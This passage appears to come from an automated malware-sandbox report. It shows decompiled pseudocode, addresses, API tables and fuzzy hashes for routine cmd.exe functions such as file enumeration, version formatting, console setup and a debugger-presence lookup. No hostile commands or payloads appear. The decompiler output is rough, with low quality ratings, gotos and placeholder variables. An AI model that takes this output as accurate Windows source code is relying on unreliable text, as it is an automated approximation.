												L25:
												if(_t97 == 0) {
													goto L46;
												} else {
													_t147 = L"..";
													_t98 =  &_v564;
													while(1) {
														_t164 =  *_t98;
														if(_t164 !=  *_t147) {
															break;
														}
														if(_t164 == 0) {
															L31:
															_t99 = _t125;
														} else {
															_t164 =  *((intOrPtr*)(_t98 + 2));
															_t41 =  &(_t147[2]); // 0x2e
															if(_t164 !=  *_t41) {
																break;
															} else {
																_t98 = _t98 + 4;
																_t147 =  &(_t147[4]);
																if(_t164 != 0) {
																	continue;
																} else {
																	goto L31;
																}
															}
														}
														L33:
														if(_t99 == 0) {
															goto L46;
														} else {
															_t168 = _t189;
															_t42 =  &(_t168[1]); // 0x2
															_t148 = _t42;
															do {
																_t100 =  *_t168;
																_t168 =  &(_t168[1]);
															} while (_t100 != _t125);
															_t149 =  &_v564;
															_t170 = _t168 - _t148 >> 1;
															_t181 = _t149 + 2;
															do {
																_t101 =  *_t149;
																_t149 = _t149 + 2;
															} while (_t101 != _t125);
															_t45 = _t170 + 2; // 0x0
															_t183 = _t45 + (_t149 - _t181 >> 1);
															if(_t183 <= _v624) {
																_t183 = _v624;
																goto L45;
															} else {
																_t164 = _t183 + _t183;
																_t107 = E011E0100(_t189, _t183 + _t183);
																if(_t107 == 0) {
																	_t124 = 1;
																} else {
																	_t189 = _t107;
																	_v624 = _t183;
																	_t157 = _t107;
																	while( *_t107 != _t125) {
																		_t157 = _t107;
																		_t107 =  &(_t107[1]);
																	}
																	_t49 =  &(_t157[1]); // 0x2
																	_v632 = _t49;
																	L45:
																	E011E18C0(_t189, _t183,  &_v564);
																	E011E18C0(_t189, _t183, "\\");
																	_t164 = _v620;
																	_t124 = E011F31DC(_t189, _v620, _v624, _a8, _v628);
																	_v656 = _t124;
																	 *_v652 = 0;
																	goto L47;
																}
															}
														}
														goto L50;
													}
													asm("sbb eax, eax");
													_t99 = _t98 | 0x00000001;
													goto L33;
												}
												goto L50;
											}
											asm("sbb eax, eax");
											_t97 = _t96 | 0x00000001;
											_t125 = 0;
											goto L25;
										}
										L50:
										FindClose(_v628);
										goto L52;
										L47:
									} while (FindNextFileW(_v628,  &(_v612.ftCreationTime)) != 0);
									goto L50;
								}
								L52:
								E011E0040(_t189);
								_t69 = _t124;
							}
						} else {
							L8:
							_t69 = 1;
						}
					}
				}
				_pop(_t177);
				_pop(_t186);
				_pop(_t120);
				return E011E6FD0(_t69, _t120, _v8 ^ _t194, _t164, _t177, _t186);
			}































































                                    0x011f31e4
                                    0x011f31ea
                                    0x011f31f1
                                    0x011f31fa
                                    0x011f3201
                                    0x011f3204
                                    0x011f320b
                                    0x011f320f
                                    0x011f3213
                                    0x011f3213
                                    0x011f3216
                                    0x011f321a
                                    0x011f321c
                                    0x011f321c
                                    0x011f321f
                                    0x011f3222
                                    0x011f3229
                                    0x011f322b
                                    0x011f3230
                                    0x011f34ed
                                    0x011f34ed
                                    0x011f3236
                                    0x011f3236
                                    0x011f3236
                                    0x011f3238
                                    0x011f3238
                                    0x011f323b
                                    0x011f323e
                                    0x011f324b
                                    0x011f324f
                                    0x011f3257
                                    0x00000000
                                    0x011f325d
                                    0x011f325d
                                    0x011f3260
                                    0x011f3263
                                    0x011f326f
                                    0x011f3273
                                    0x011f3281
                                    0x011f3283
                                    0x011f3287
                                    0x011f328c
                                    0x011f328e
                                    0x011f329e
                                    0x011f32ab
                                    0x011f32b9
                                    0x011f32bb
                                    0x011f32bd
                                    0x011f32c6
                                    0x011f32cd
                                    0x011f32cd
                                    0x011f328e
                                    0x011f32d9
                                    0x011f32e2
                                    0x011f32ec
                                    0x011f32f0
                                    0x011f32f5
                                    0x011f32fb
                                    0x011f32fd
                                    0x011f32fd
                                    0x011f3300
                                    0x011f3300
                                    0x011f3303
                                    0x011f3306
                                    0x011f330f
                                    0x011f330f
                                    0x011f3315
                                    0x011f331e
                                    0x011f3322
                                    0x00000000
                                    0x011f3328
                                    0x011f332d
                                    0x011f3334
                                    0x011f3336
                                    0x011f333b
                                    0x011f333d
                                    0x011f333d
                                    0x011f333f
                                    0x011f3342
                                    0x011f333d
                                    0x011f3347
                                    0x011f334a
                                    0x011f3353
                                    0x011f3357
                                    0x011f3368
                                    0x011f3370
                                    0x011f3374
                                    0x011f337a
                                    0x011f34de
                                    0x011f3380
                                    0x011f3380
                                    0x011f3385
                                    0x011f34b2
                                    0x011f34b2
                                    0x00000000
                                    0x011f338b
                                    0x011f338b
                                    0x011f3390
                                    0x011f3394
                                    0x011f3394
                                    0x011f339a
                                    0x00000000
                                    0x00000000
                                    0x011f339f
                                    0x011f33b6
                                    0x011f33b6
                                    0x011f33b8
                                    0x011f33a1
                                    0x011f33a1
                                    0x011f33a5
                                    0x011f33a9
                                    0x00000000
                                    0x011f33ab
                                    0x011f33ab
                                    0x011f33ae
                                    0x011f33b4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f33b4
                                    0x011f33a9
                                    0x011f33c3
                                    0x011f33c5
                                    0x00000000
                                    0x011f33cb
                                    0x011f33cb
                                    0x011f33d0
                                    0x011f33d4
                                    0x011f33d4
                                    0x011f33da
                                    0x00000000
                                    0x00000000
                                    0x011f33df
                                    0x011f33f6
                                    0x011f33f6
                                    0x011f33e1
                                    0x011f33e1
                                    0x011f33e5
                                    0x011f33e9
                                    0x00000000
                                    0x011f33eb
                                    0x011f33eb
                                    0x011f33ee
                                    0x011f33f4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f33f4
                                    0x011f33e9
                                    0x011f33ff
                                    0x011f3401
                                    0x00000000
                                    0x011f3407
                                    0x011f3407
                                    0x011f3409
                                    0x011f3409
                                    0x011f340c
                                    0x011f340c
                                    0x011f340f
                                    0x011f3412
                                    0x011f3419
                                    0x011f341d
                                    0x011f341f
                                    0x011f3422
                                    0x011f3422
                                    0x011f3425
                                    0x011f3428
                                    0x011f342f
                                    0x011f3434
                                    0x011f343a
                                    0x011f346b
                                    0x00000000
                                    0x011f343c
                                    0x011f343c
                                    0x011f3441
                                    0x011f3448
                                    0x011f34d1
                                    0x011f344e
                                    0x011f344e
                                    0x011f3450
                                    0x011f3454
                                    0x011f345d
                                    0x011f3458
                                    0x011f345a
                                    0x011f345a
                                    0x011f3462
                                    0x011f3465
                                    0x011f346f
                                    0x011f3478
                                    0x011f3486
                                    0x011f348f
                                    0x011f34a1
                                    0x011f34a9
                                    0x011f34ad
                                    0x00000000
                                    0x011f34ad
                                    0x011f3448
                                    0x011f343a
                                    0x00000000
                                    0x011f3401
                                    0x011f33fa
                                    0x011f33fc
                                    0x00000000
                                    0x011f33fc
                                    0x00000000
                                    0x011f33c5
                                    0x011f33bc
                                    0x011f33be
                                    0x011f33c1
                                    0x00000000
                                    0x011f33c1
                                    0x011f34d2
                                    0x011f34d6
                                    0x00000000
                                    0x011f34b6
                                    0x011f34c5
                                    0x00000000
                                    0x011f34cd
                                    0x011f34e2
                                    0x011f34e4
                                    0x011f34e9
                                    0x011f34e9
                                    0x011f3275
                                    0x011f3275
                                    0x011f3277
                                    0x011f3277
                                    0x011f3273
                                    0x011f3257
                                    0x011f34f6
                                    0x011f34f7
                                    0x011f34f8
                                    0x011f3503

                                    APIs
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 011F3362
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 011F34BF
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F34D6
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                    • Instruction ID: ea202249c0176331835fe5eea9022bca7728bbc3396f3b1e5b8ed8b726ba87c9
                                    • Opcode Fuzzy Hash: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                    • Instruction Fuzzy Hash: EF9105357182028BCB2DEF68C85056FB7E2FFD8244B45892DEA66C7344EB31D946C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D443C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E011D443C(void* __ecx) {
				signed char _t5;
				void* _t12;

				_t12 = __ecx;
				_t5 = GetVersion();
				_push(E011D4476());
				_push(_t5 >> 0x10);
				_push(_t5 >> 0x00000008 & 0x000000ff);
				return E011E274C(_t12, 0x20, L"%d.%d.%05d.%d", _t5 & 0x000000ff);
			}





                                    0x011d4440
                                    0x011d4448
                                    0x011d444f
                                    0x011d445a
                                    0x011d4461
                                    0x011d4475

                                    APIs
                                    • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,011F731D,?,?,?,?,?), ref: 011D4442
                                      • Part of subcall function 011D4476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,011F731D,?,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D449A
                                      • Part of subcall function 011D4476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(011F731D,UBR,00000000,?,?,011D444F,?,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D44BE
                                      • Part of subcall function 011D4476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(011F731D,?,011D444F,?,011F731D,?,?,?,?,?), ref: 011D44C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValueVersion
                                    • String ID: %d.%d.%05d.%d
                                    • API String ID: 2996790148-3457777122
                                    • Opcode ID: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                    • Instruction ID: d8b87bb812f0a474e0cfd25c28be566a08f53c50b86f9a5a476e0c8d96e635ac
                                    • Opcode Fuzzy Hash: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                    • Instruction Fuzzy Hash: 26D02BB1B5013037D62C65AA1C5DE7B508DC6E8022744402EF80193285DBB85C1442B4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F2258, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,00000006,?,011F2418), ref: 011F228B
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: DebuggerPresent
                                    • String ID:
                                    • API String ID: 1347740429-0
                                    • Opcode ID: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                    • Instruction ID: 62bec8d4ed78aa68b2ca6a63eafb7252236bc747a1e3d5367e4f69c6b4e06c6b
                                    • Opcode Fuzzy Hash: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                    • Instruction Fuzzy Hash: 0AF02034A0412EAB8F38DFB9B50977A3BE8AB65704B41015DE907C7145CF30E9009B92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E7310, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011E7310() {

				SetUnhandledExceptionFilter(E011E72C0);
				return 0;
			}



                                    0x011e7315
                                    0x011e731d

                                    APIs
                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000172C0), ref: 011E7315
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: b7cb22bbca189cae88a2d674bcad2cdad209ff327a4103c2058d88598af721dc
                                    • Instruction ID: 3ac6eef4a0fd1bf9d7958076283795cde8cc2069a6392bc08c55886776918096
                                    • Opcode Fuzzy Hash: b7cb22bbca189cae88a2d674bcad2cdad209ff327a4103c2058d88598af721dc
                                    • Instruction Fuzzy Hash: 61900260B5191186DF2867F27C1D50575E05AA96067414464F001C9048DF6041485661
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3D27, Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 299memorylibraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E011E3D27(void* __ebx, intOrPtr* __ecx) {
				signed int _v8;
				char _v72;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v96;
				void* _v100;
				intOrPtr* _v104;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t26;
				void* _t29;
				void* _t30;
				WCHAR* _t36;
				intOrPtr _t57;
				WCHAR* _t59;
				int _t60;
				WCHAR* _t72;
				struct HINSTANCE__* _t76;
				intOrPtr* _t80;
				int _t88;
				WCHAR* _t89;
				WCHAR* _t91;
				void* _t95;
				void* _t98;
				short _t100;
				intOrPtr* _t109;
				WCHAR* _t113;
				short _t122;
				short* _t125;
				void* _t129;
				long _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				signed int _t138;
				void* _t139;

				_t95 = __ebx;
				_t26 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t26 ^ _t138;
				_t133 = __ecx;
				_v104 = __ecx;
				 *0x1203858 = 0x120385c;
				InitializeCriticalSection(0x120385c);
				EnterCriticalSection( *0x1203858);
				_t131 = 0;
				 *0x11fd544 = 0;
				LeaveCriticalSection( *0x1203858);
				_t29 = SetConsoleCtrlHandler(E011F6D90, 1);
				__imp___get_osfhandle(0x120387c);
				_t30 = GetConsoleMode(_t29, 1);
				__imp___get_osfhandle(0, 0x1203878);
				_pop(_t98);
				GetConsoleMode(_t30, ??);
				E011E06C0(_t98);
				 *0x1203834 = E011E3AAE();
				 *0x1203830 = E011E3B2C(_t98);
				L011E41DD(_t133);
				_t36 = GetCommandLineW();
				_t3 =  &(_t36[1]); // 0x2
				_t125 = _t3;
				do {
					_t100 =  *_t36;
					_t36 =  &(_t36[1]);
				} while (_t100 != 0);
				_t144 = (_t36 - _t125 >> 1) + 1 - 0x2000;
				if((_t36 - _t125 >> 1) + 1 > 0x2000) {
					_push(0);
					E011DC5A2(0x2000);
					_t103 = 0x400023df;
					do {
						__eflags = E011E4B60(__eflags, 0);
					} while (__eflags == 0);
					L21:
					exit(1);
					L22:
					_push(_t131);
					E011DC5A2(_t103);
					_t103 = 0x2374;
					do {
						__eflags = E011E4B60(__eflags, _t131);
					} while (__eflags == 0);
					goto L21;
				}
				_t103 =  &_v100;
				E011E2A7C( &_v100, 0x2000, _t144);
				_t134 = _v100;
				if(_t134 == 0) {
					goto L22;
				}
				E011E1040(_t134, 0x2000, GetCommandLineW());
				if(E011E0C70(0x1213ab0, ((0 |  *0x1213cbc == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					_push(0);
					E011DC5A2(0x1213ab0);
					_t103 = 0x2374;
					do {
						__eflags = E011E4B60(__eflags, 0);
					} while (__eflags == 0);
					goto L21;
				}
				_t108 =  *0x1213cb8;
				if( *0x1213cb8 == 0) {
					_t108 = 0x1213ab0;
				}
				E011E36CB(_t95, _t108,  *0x1213cc0, _t131);
				E011DCEA9();
				_t109 = _t134;
				_t129 = _t109 + 2;
				do {
					_t57 =  *_t109;
					_t109 = _t109 + 2;
					_t149 = _t57 - _t131;
				} while (_t57 != _t131);
				E011DD3F4(_v104, _t149, _t134, _t109 - _t129 >> 1);
				_t59 =  *0x1213cb8;
				_t130 = 0x1213ab0;
				_t113 = _t59;
				if(_t59 == 0) {
					_t113 = 0x1213ab0;
				}
				_t135 = 0x5c;
				_t136 = _v100;
				if( *_t113 == _t135) {
					_t103 = _t59;
					__eflags = _t59;
					if(_t59 == 0) {
						_t103 = _t130;
					}
					_t137 = 0x5c;
					__eflags = _t103[1] - _t137;
					_t136 = _v100;
					if(_t103[1] != _t137) {
						goto L10;
					} else {
						__eflags =  *0x1218528;
						if( *0x1218528 != 0) {
							goto L10;
						}
						__eflags = _t59;
						if(_t59 == 0) {
							_t59 = _t130;
						}
						E011DC5A2(_t103, 0x400023c8, 1, _t59);
						_t91 =  *0x1213cb8;
						_t139 = _t139 + 0xc;
						__eflags = _t91;
						if(_t91 == 0) {
							_t91 = 0x1213ab0;
						}
						__eflags = GetWindowsDirectoryW(_t91,  *0x1213cc0);
						if(__eflags == 0) {
							do {
								__eflags = E011E4B60(__eflags, _t131);
							} while (__eflags == 0);
							goto L21;
						} else {
							_t124 =  *0x1213cb8;
							__eflags =  *0x1213cb8;
							if(__eflags == 0) {
								_t124 = 0x1213ab0;
							}
							_t130 = 0;
							E011E33FC(_t95, _t124, 0, _t131, _t136, __eflags);
							goto L10;
						}
					}
				} else {
					L10:
					_t60 = GetConsoleOutputCP();
					 *0x1203854 = _t60;
					GetCPInfo(_t60, 0x1203840);
					E011E3F80();
					_t64 = HeapAlloc(GetProcessHeap(), _t131, 0x20c);
					 *0x1203874 = _t64;
					if(_t64 != 0 && _t64 == 0) {
						_t64 =  *0x1203874;
						 *( *0x1203874) = 0;
					}
					if( *0x1213ccc == _t131) {
						__eflags = E011E269C(_t64);
						if(__eflags == 0) {
							goto L13;
						}
						__eflags =  *0x11fd5a0 - _t131; // 0x0
						if(__eflags != 0) {
							L51:
							_t122 =  *0x11fd5a0; // 0x0
							E011F7DF1(_t122, _t136);
							goto L13;
						}
						_t88 = GetConsoleScreenBufferInfo(GetStdHandle(0xfffffff5),  &_v96);
						__eflags = _t88;
						if(_t88 == 0) {
							_t89 =  *0x11fd5a0; // 0x0
						} else {
							_t89 = _v96.wAttributes;
							 *0x11fd5a0 = _t89;
						}
						__eflags = _t89;
						if(__eflags == 0) {
							goto L13;
						} else {
							goto L51;
						}
					} else {
						L13:
						if( *((intOrPtr*)(_v104 + 8)) == _t131) {
							_v100 = E011F6456(__eflags);
							E011D443C( &_v72);
							E011DC108( &_v72, 0x2350, 1,  &_v72);
							E011E25D9(L"\r\n");
							_t72 = _v100;
							__eflags = _t72;
							if(_t72 == 0) {
								_push(_t131);
								_push(8);
								E011DC5A2( &_v72);
							} else {
								_push(_t72);
								E011E25D9(L"%s");
								E011E25D9(L"\r\n");
							}
							GlobalFree(_v100);
						}
						_t76 = GetModuleHandleW(L"KERNEL32.DLL");
						 *0x11fd0d0 = _t76;
						 *0x120388c = GetProcAddress(_t76, "CopyFileExW");
						GetProcAddress( *0x11fd0d0, "IsDebuggerPresent");
						 *0x1203888 = GetProcAddress( *0x11fd0d0, "SetConsoleInputExeNameW");
						_t80 = _v104;
						if( *_t80 != _t131 ||  *((intOrPtr*)(_t80 + 4)) != _t131 ||  *((intOrPtr*)(_t80 + 8)) != _t131) {
							_t131 = 1;
						}
						__imp__??_V@YAXPAX@Z();
						return E011E6FD0(_t131, _t95, _v8 ^ _t138, _t130, _t131, _t136, _t136);
					}
				}
			}








































                                    0x011e3d27
                                    0x011e3d2f
                                    0x011e3d36
                                    0x011e3d3f
                                    0x011e3d43
                                    0x011e3d46
                                    0x011e3d4b
                                    0x011e3d57
                                    0x011e3d63
                                    0x011e3d65
                                    0x011e3d6b
                                    0x011e3d78
                                    0x011e3d85
                                    0x011e3d8d
                                    0x011e3d99
                                    0x011e3d9f
                                    0x011e3da1
                                    0x011e3da7
                                    0x011e3db1
                                    0x011e3dbd
                                    0x011e3dc2
                                    0x011e3dc7
                                    0x011e3dcd
                                    0x011e3dcd
                                    0x011e3dd0
                                    0x011e3dd0
                                    0x011e3dd3
                                    0x011e3dd6
                                    0x011e3de5
                                    0x011e3de7
                                    0x011ee043
                                    0x011ee049
                                    0x011ee04f
                                    0x011ee050
                                    0x011ee056
                                    0x011ee056
                                    0x011ee05a
                                    0x011ee05c
                                    0x011ee062
                                    0x011ee062
                                    0x011ee068
                                    0x011ee06e
                                    0x011ee06f
                                    0x011ee075
                                    0x011ee075
                                    0x00000000
                                    0x011ee079
                                    0x011e3def
                                    0x011e3df2
                                    0x011e3df7
                                    0x011e3dfc
                                    0x00000000
                                    0x00000000
                                    0x011e3e10
                                    0x011e3e38
                                    0x011ee07b
                                    0x011ee081
                                    0x011ee087
                                    0x011ee088
                                    0x011ee08e
                                    0x011ee08e
                                    0x00000000
                                    0x011ee092
                                    0x011e3e3e
                                    0x011e3e46
                                    0x011ee094
                                    0x011ee094
                                    0x011e3e53
                                    0x011e3e58
                                    0x011e3e5d
                                    0x011e3e5f
                                    0x011e3e62
                                    0x011e3e62
                                    0x011e3e65
                                    0x011e3e68
                                    0x011e3e68
                                    0x011e3e76
                                    0x011e3e7b
                                    0x011e3e80
                                    0x011e3e85
                                    0x011e3e89
                                    0x011ee09e
                                    0x011ee09e
                                    0x011e3e91
                                    0x011e3e95
                                    0x011e3e98
                                    0x011ee0a5
                                    0x011ee0a7
                                    0x011ee0a9
                                    0x011ee0ab
                                    0x011ee0ab
                                    0x011ee0af
                                    0x011ee0b0
                                    0x011ee0b4
                                    0x011ee0b7
                                    0x00000000
                                    0x011ee0bd
                                    0x011ee0bd
                                    0x011ee0c4
                                    0x00000000
                                    0x00000000
                                    0x011ee0ca
                                    0x011ee0cc
                                    0x011ee0ce
                                    0x011ee0ce
                                    0x011ee0d8
                                    0x011ee0dd
                                    0x011ee0e2
                                    0x011ee0e5
                                    0x011ee0e7
                                    0x011ee0e9
                                    0x011ee0e9
                                    0x011ee0fb
                                    0x011ee0fd
                                    0x011ee11a
                                    0x011ee120
                                    0x011ee120
                                    0x00000000
                                    0x011ee0ff
                                    0x011ee0ff
                                    0x011ee105
                                    0x011ee107
                                    0x011ee109
                                    0x011ee109
                                    0x011ee10e
                                    0x011ee110
                                    0x00000000
                                    0x011ee110
                                    0x011ee0fd
                                    0x011e3e9e
                                    0x011e3e9e
                                    0x011e3e9e
                                    0x011e3eaa
                                    0x011e3eaf
                                    0x011e3eb5
                                    0x011e3ec7
                                    0x011e3ecd
                                    0x011e3ed4
                                    0x011ee129
                                    0x011ee130
                                    0x011ee130
                                    0x011e3ef0
                                    0x011ee140
                                    0x011ee142
                                    0x00000000
                                    0x00000000
                                    0x011ee148
                                    0x011ee14f
                                    0x011ee183
                                    0x011ee183
                                    0x011ee189
                                    0x00000000
                                    0x011ee189
                                    0x011ee15e
                                    0x011ee164
                                    0x011ee166
                                    0x011ee174
                                    0x011ee168
                                    0x011ee168
                                    0x011ee16c
                                    0x011ee16c
                                    0x011ee17a
                                    0x011ee17d
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e3ef6
                                    0x011e3ef6
                                    0x011e3efc
                                    0x011ee19b
                                    0x011ee19e
                                    0x011ee1ae
                                    0x011ee1b8
                                    0x011ee1bd
                                    0x011ee1c3
                                    0x011ee1c5
                                    0x011ee1e1
                                    0x011ee1e2
                                    0x011ee1e4
                                    0x011ee1c7
                                    0x011ee1c7
                                    0x011ee1cd
                                    0x011ee1d7
                                    0x011ee1dc
                                    0x011ee1ef
                                    0x011ee1ef
                                    0x011e3f07
                                    0x011e3f13
                                    0x011e3f29
                                    0x011e3f2e
                                    0x011e3f45
                                    0x011e3f4a
                                    0x011e3f4f
                                    0x011e3f5d
                                    0x011e3f5d
                                    0x011e3f5f
                                    0x011e3f77
                                    0x011e3f77
                                    0x011e3ef0

                                    APIs
                                    • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0120385C), ref: 011E3D4B
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D57
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011E3D6B
                                    • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(011F6D90,00000001), ref: 011E3D78
                                    • _get_osfhandle.MSVCRT ref: 011E3D85
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                    • _get_osfhandle.MSVCRT ref: 011E3D99
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06D8
                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06EF
                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E071E
                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E0750
                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                      • Part of subcall function 011E3B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                      • Part of subcall function 011E3B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 011E3E9E
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E3EAF
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 011E3EC0
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3EC7
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 011E3EDC
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 011E3F07
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 011E3F18
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 011E3F2E
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 011E3F3F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3F5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
